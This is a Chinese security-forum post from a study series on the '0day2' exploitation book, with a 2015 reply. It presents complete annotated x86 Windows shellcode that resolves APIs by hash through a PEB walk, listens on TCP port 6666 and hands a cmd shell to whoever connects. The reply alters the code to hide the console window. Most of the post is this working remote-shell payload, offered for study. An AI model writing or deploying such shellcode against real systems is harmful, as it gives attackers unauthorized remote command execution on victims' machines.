[原创]旧书重温:0day2[6]bind_shell
发表于: 2013-12-17 18:19 4348


旧书重温:0day2【1】 简单的缓冲区溢出案例 http://bbs.pediy.com/showthread.php?t=182497
旧书重温:0day2【2】 实验:三种获取kernel32.dll基址的方法 http://bbs.pediy.com/showthread.php?t=182498
旧书重温:0day2【3】 详细解读PEB法 查找kener32地址 http://bbs.pediy.com/showthread.php?t=182499
旧书重温:0day2【4】动态获取函数地址 http://bbs.pediy.com/showthread.php?t=182520
旧书重温:0day2【5】shellcode变形记 http://bbs.pediy.com/showthread.php?t=182551
旧书重温:0day2【6】bind_shell http://bbs.pediy.com/showthread.php?t=182689
/*
LoadLibraryA             function`s hash is 0c917432
CreateProcessA           function`s hash is 6ba6bcc9
ExitProcess              function`s hash is 4fd18963
WSAStartup               function`s hash is 80b46a3d
WSASocketA               function`s hash is de78322d
bind                     function`s hash is dda71064
listen                     function`s hash is 4bd39f0c
accept                     function`s hash is 01971eb1
GetProcAddress           function`s hash is bbafdf85
Press any key to continue
 */
void bind_shell()
{
    // Stage 1 of the bind-shell exercise this series follows (the earlier
    // posts cover the PEB walk and the hash lookup on their own). This
    // listing only resolves the eight API addresses and then stops at
    // `int 13`; the socket sequence is added in the second listing below.
    //
    // Stack layout built by the prologue:
    //   esi -> hash list (8 dwords, ExitProcess hash on top)
    //   edi -> slot table that receives the resolved addresses via stosd
    //   esp is then lowered by 0x500 so later pushes/calls clobber neither.
    //
    // Defender note: the eight ROR-7 hash constants, the fs:[0x30] PEB read
    // and the 12-wide-char module-name test are the static features a
    // signature for this shellcode family keys on.
    __asm
    {
        CLD                            // lodsd/stosd walk upward
        // hashes, pushed in reverse so lodsd reads them in the order listed

        push 0x80b46a3d                //WSAStartup
        push 0xde78322d                //WSASocketA
        push 0xdda71064                //bind
        push 0x4bd39f0c                //listen
        push 0x01971eb1                //accept
                                       //------------ the five above are ws2_32.dll exports
        push 0x0c917432                //LoadLibraryA
        push 0x6ba6bcc9                //CreateProcessA
        push 0x4fd18963                //ExitProcess
                                       //------------ the three above are kernel32.dll exports
        mov esi,esp                    // esi = top of the hash list (ExitProcess hash first)
        lea edi,[esi - 0x20]           // 8 functions * 4 = 0x20: edi = slot table for the resolved addresses, placed 0x20 below the list

        xor ebx,ebx
        mov bh,0x05                    // ebx = 0x500
        sub esp,ebx                    // lower esp by 0x500 so the hash list and slot table survive later pushes/calls

        mov bx,0x3233                  // "32" followed by two NUL bytes (ebx = 0x00003233)
        push ebx
        push 0x5F327377                // "ws2_" -> the stack now holds "ws2_32\0\0"
        push  esp                      // pointer to "ws2_32"; it stays at [esp] and is consumed as the LoadLibraryA argument in find_lib_functions
        xor edx,edx                    // edx = 0: fs displacement base below, and the NUL compared against in next_module

        mov ebx,fs:[edx+0x30]          // TEB+0x30 -> PEB
        mov ecx,[ebx + 0x0c]           // PEB->Ldr
        mov ecx,[ecx + 0x1c]           // first entry of the module list at Ldr+0x1c (32-bit: InInitializationOrderModuleList)

        push edi                       // save slot-table pointer and hash pointer across the module scan
        push esi

next_module:
        mov ebp,[ecx+0x08]             // candidate module base
        mov edi,[ecx+0x20]             // its BaseDllName buffer (UTF-16)
        mov ecx,[ecx]                  // Flink -> next entry
        cmp [edi + 12*2],dx            // 13th wide char == 0, i.e. a 12-character name ("kernel32.dll" is the intended match)
        jne next_module

        pop esi
        pop edi                        // ebp = kernel32 base from here on


find_lib_functions:

            lodsd                      // eax = next hash, esi advances
            cmp eax,0x01971eb1         // accept is the first ws2_32 hash in this list order ...

            jne find_functions         // ... so reaching it means the DLL has to be switched
            xchg ebp,eax               // park the kernel32 base in eax and the hash in ebp across the call
            call [edi - 0x04]          // slot just below edi = third address written = LoadLibraryA; its argument is the "ws2_32" pointer still at [esp] (the original note said edi - 0x0c, which does not match the code)
            xchg ebp,eax               // ebp = ws2_32 base, eax = hash again

find_functions:
            pushad                     // saves all registers; the wanted hash (eax) is now at [esp+0x1c]
            mov eax,[ebp+0x3c]         // e_lfanew
            mov ecx,[ebp+eax+0x78]     // export directory RVA (first data directory entry)
            add ecx,ebp                // -> IMAGE_EXPORT_DIRECTORY
            mov ebx,[ecx+0x20]         // AddressOfNames
            add ebx,ebp
            xor edi,edi                // name index

next_function_loop:
            inc edi                    // index starts at 1; name 0 is never tested
            mov esi,[ebx+edi*4]        // esi -> exported name
            add esi,ebp
            cdq                        // edx = 0: hash accumulator (eax is e_lfanew on the first pass and the 0 terminator afterwards)

hash_loop:                             // hash = ror(hash, 7) + byte, over the whole name
            movsx eax,byte ptr[esi]
            cmp al,ah                  // ah is the sign extension of al, so equal only for 0x00 (or 0xFF): end of the name
            jz compare_hash
            ror edx,7
            add edx,eax
            inc esi
            jmp hash_loop

compare_hash:
            cmp edx,[esp+0x1c]         // computed hash vs. the wanted one saved by pushad
            jnz next_function_loop
            mov ebx,[ecx+0x24]         // AddressOfNameOrdinals
            add ebx,ebp
            mov di,[ebx+2*edi]         // ordinal for this name (16-bit; the upper half of edi is already 0)
            mov ebx,[ecx+0x1c]         // AddressOfFunctions
            add ebx,ebp
            add ebp,[ebx +4*edi]       // ebp = function VA
            xchg eax,ebp               // eax = function VA
            pop edi                    // outer edi (slot pointer) sits on top of the pushad frame
            stosd                      // write the address, edi += 4
            push edi                   // so that popad restores the advanced slot pointer
            popad                      // eax = hash again
            cmp eax,0x80b46a3d         // WSAStartup is the last hash in this list order: stop once it is resolved
            jne find_lib_functions

function_call:                         // all eight addresses resolved; the socket sequence was to follow here


int 13                                 // left in by the author to attach OllyDbg; note this is interrupt 0x0d, not the int 3 breakpoint (whether that was intended is not stated)






    }

}
CLD                                    // lodsd/stosd walk upward
        // Complete body of the exercise. Differences from the first listing:
        // the ws2_32 hashes are pushed in call order (WSAStartup first after
        // the kernel32 trio) and the slot table sits 0x20 bytes ABOVE the hash
        // list, so the resolved addresses can be consumed with lodsd in the
        // same order they are needed. Resulting slot table (T = top of hash list):
        //   T+0x20 ExitProcess  T+0x24 CreateProcessA  T+0x28 LoadLibraryA
        //   T+0x2c WSAStartup   T+0x30 WSASocketA      T+0x34 bind
        //   T+0x38 listen       T+0x3c accept
        // Behaviour: listens on TCP port 6666 (sockaddr constant below) and
        // starts "cmd" with its standard handles redirected to the accepted
        // socket. Defender note: the hash constants, the fs:[0x30] read, the
        // port constant and the "cmd" dword are the static indicators here.





        push 0x01971eb1                //accept
        push 0x4bd39f0c                //listen
        push 0xdda71064                //bind
        push 0xde78322d                //WSASocketA
        push 0x80b46a3d                //WSAStartup
                                       //------------ the five above are ws2_32.dll exports
        push 0x0c917432                //LoadLibraryA
        push 0x6ba6bcc9                //CreateProcessA
        push 0x4fd18963                //ExitProcess
                                       //------------ the three above are kernel32.dll exports
        mov esi,esp                    // esi = top of the hash list (ExitProcess hash first)
        lea edi,[esi + 0x20]           // 8 functions * 4 = 0x20: slot table directly above the hash list (overwrites whatever the caller had there)

        xor ebx,ebx
        mov bh,0x05                    // ebx = 0x500
        sub esp,ebx                    // lower esp by 0x500 so the hash list survives later pushes/calls

        mov bx,0x3233                  // "32" followed by two NUL bytes (ebx = 0x00003233)
        push ebx
        push 0x5F327377                // "ws2_" -> the stack now holds "ws2_32\0\0"
        push  esp                      // pointer to "ws2_32"; it stays at [esp] and is consumed as the LoadLibraryA argument in find_lib_functions
        xor edx,edx                    // edx = 0: fs displacement base below, and the NUL compared against in next_module

        mov ebx,fs:[edx+0x30]          // TEB+0x30 -> PEB
        mov ecx,[ebx + 0x0c]           // PEB->Ldr
        mov ecx,[ecx + 0x1c]           // first entry of the module list at Ldr+0x1c (32-bit: InInitializationOrderModuleList)

        push edi                       // save slot-table pointer and hash pointer across the module scan
        push esi

next_module:
        mov ebp,[ecx+0x08]             // candidate module base
        mov edi,[ecx+0x20]             // its BaseDllName buffer (UTF-16)
        mov ecx,[ecx]                  // Flink -> next entry
        cmp [edi + 12*2],dx            // 13th wide char == 0, i.e. a 12-character name ("kernel32.dll" is the intended match)
        jne next_module

        pop esi
        pop edi                        // ebp = kernel32 base from here on


find_lib_functions:

            lodsd                      // eax = next hash, esi advances
            cmp eax,0x80b46a3d         // WSAStartup is the first ws2_32 hash in this order ...

            jne find_functions         // ... so reaching it means the DLL has to be switched
            xchg ebp,eax               // park the kernel32 base in eax and the hash in ebp across the call
            call [edi - 0x04]          // slot just below edi = third address written = LoadLibraryA; its argument is the "ws2_32" pointer still at [esp] (the original note said edi - 0x0c, which does not match the code)
            xchg ebp,eax               // ebp = ws2_32 base, eax = hash again

find_functions:
            pushad                     // saves all registers; the wanted hash (eax) is now at [esp+0x1c]
            mov eax,[ebp+0x3c]         // e_lfanew
            mov ecx,[ebp+eax+0x78]     // export directory RVA (first data directory entry)
            add ecx,ebp                // -> IMAGE_EXPORT_DIRECTORY
            mov ebx,[ecx+0x20]         // AddressOfNames
            add ebx,ebp
            xor edi,edi                // name index

next_function_loop:
            inc edi                    // index starts at 1; name 0 is never tested
            mov esi,[ebx+edi*4]        // esi -> exported name
            add esi,ebp
            cdq                        // edx = 0: hash accumulator (eax is e_lfanew on the first pass and the 0 terminator afterwards)

hash_loop:                             // hash = ror(hash, 7) + byte, over the whole name
            movsx eax,byte ptr[esi]
            cmp al,ah                  // ah is the sign extension of al, so equal only for 0x00 (or 0xFF): end of the name
            jz compare_hash
            ror edx,7
            add edx,eax
            inc esi
            jmp hash_loop

compare_hash:
            cmp edx,[esp+0x1c]         // computed hash vs. the wanted one saved by pushad
            jnz next_function_loop
            mov ebx,[ecx+0x24]         // AddressOfNameOrdinals
            add ebx,ebp
            mov di,[ebx+2*edi]         // ordinal for this name (16-bit; the upper half of edi is already 0)
            mov ebx,[ecx+0x1c]         // AddressOfFunctions
            add ebx,ebp
            add ebp,[ebx +4*edi]       // ebp = function VA
            xchg eax,ebp               // eax = function VA
            pop edi                    // outer edi (slot pointer) sits on top of the pushad frame
            stosd                      // write the address, edi += 4
            push edi                   // so that popad restores the advanced slot pointer
            popad                      // eax = hash again
            cmp eax,0x01971eb1         // accept is the last hash in this order: stop once it is resolved
            jne find_lib_functions

function_call:                         // all eight addresses resolved; esi now points at the start of the slot table (T+0x20)

            add esi,0x0c               // skip the three kernel32 slots so the next lodsd yields WSAStartup

            //mov eax,[esi]
    //-------------------------------------------------- WSAStartup(wVersionRequested, lpWSAData)
            //std
            //std
            push esp                   // lpWSAData = the scratch area at esp (inside the 0x500 reserved region)
            push 0x02                  // wVersionRequested = 2
            lodsd
            call eax                   // WSAStartup(2, esp); returns 0 on success, which the code below relies on
    // eax == 0 here: reused as the fill value for rep stosd and as the NULL arguments later
    //------------------------------------------------- WSASocketA(af, type, protocol, lpProtocolInfo, g, dwFlags)

            mov ecx,0x50
            mov edi,esp
            rep stosd                  // zero 0x50 dwords (0x140 bytes) at esp; this area supplies the four trailing zero arguments of WSASocketA and is later reused as the zeroed STARTUPINFO

            inc eax //eax = 1
            push eax                   // type = 1 (SOCK_STREAM)
            inc eax
            push eax                   // af = 2 (AF_INET)
            lodsd
            call eax                   // WSASocketA(2, 1, 0, NULL, 0, 0) -- protocol..dwFlags come from the zeroed area above the two pushes
            xchg ebp,eax               // ebp = listening socket handle

    //-------------------------------------------------------- bind / listen / accept
            mov eax,0x0a1aff02         // sockaddr_in prefix with a filler byte so the constant has no embedded NUL
            xor ah,ah                  // -> 0x0a1a0002: sin_family = 2 (AF_INET), sin_port = 0x1a0a network order = TCP 6666
            push eax                   // sockaddr_in (first dword; the remaining bytes are whatever follows on the stack)
            push esp                   // pointer to it
call_loop:                             // bind(), listen() and accept() are all issued from this loop, in slot order
            push ebp                   // socket handle as the first argument
            lodsd
            call eax                   // the other arguments (namelen, backlog, addr/addrlen) are taken from whatever is already on the stack -- verify with a debugger
            test eax,eax
            jz call_loop               // bind and listen return 0 on success and loop; accept returns the new (non-zero) socket and falls through

            // STARTUPINFO overlaid on the zeroed area at esp
            inc byte ptr [esp+0x2d]    // dwFlags is at +0x2c: sets bit 8 = STARTF_USESTDHANDLES (0x100)
            lea edi,[esp+0x38]         // hStdInput (+0x38), hStdOutput (+0x3c), hStdError (+0x40)
            stosd                      // all three = accepted socket (eax)
            stosd
            stosd

            pop eax                    // presumably pops a 0 from the cleared region for the NULL arguments below -- confirm


            push esp                   // lpProcessInformation = scratch
            push esp                   // lpStartupInfo = the STARTUPINFO built above
            push eax                   // lpCurrentDirectory = NULL
            push eax                   // lpEnvironment = NULL
            push eax                   // dwCreationFlags = 0 (the reply below changes this to suppress the console window)
            push esp                   // bInheritHandles = non-zero (TRUE), required for the std-handle redirection
            push eax                   // lpThreadAttributes = NULL
            push eax                   // lpProcessAttributes = NULL
            //int 3
            ////////// command line "cmd"

            mov dword ptr [esi],0x646d63   // writes "cmd\0" just past the slot table (esi = T+0x40 after the last lodsd)
            push esi                   // lpCommandLine = "cmd"

            ///////////////
            push eax                   // lpApplicationName = NULL




            call [esi-0x1c]            // T+0x24 = CreateProcessA

            call [esi-0x20]            // T+0x20 = ExitProcess

最新回复 (2)
mark
2014-3-3 09:25
改了下楼主的SC,你的要跳黑框,改了下不跳了
     push esp
      push esp
      push eax
      push eax
      push eax
      push esp
      push eax
      push eax
      //int 3
      //////////cmd
      mov dword ptr [esi],0x11646d63
      mov byte ptr [esi+0x03],bl
      push esi
      ///////////////
      push eax
      call [esi-0x1c]
要改成
push esp
      push esp
      push eax
      push eax
      mov al,08
      shl eax,18h
      push eax
      xor eax,eax
      push esp
      push eax
      push eax
      //int 3
      //////////cmd
      mov dword ptr [esi],0x11646d63
      mov byte ptr [esi+0x03],bl
      push esi
      ///////////////
      push eax
      call [esi-0x1c]
2015-11-26 16:29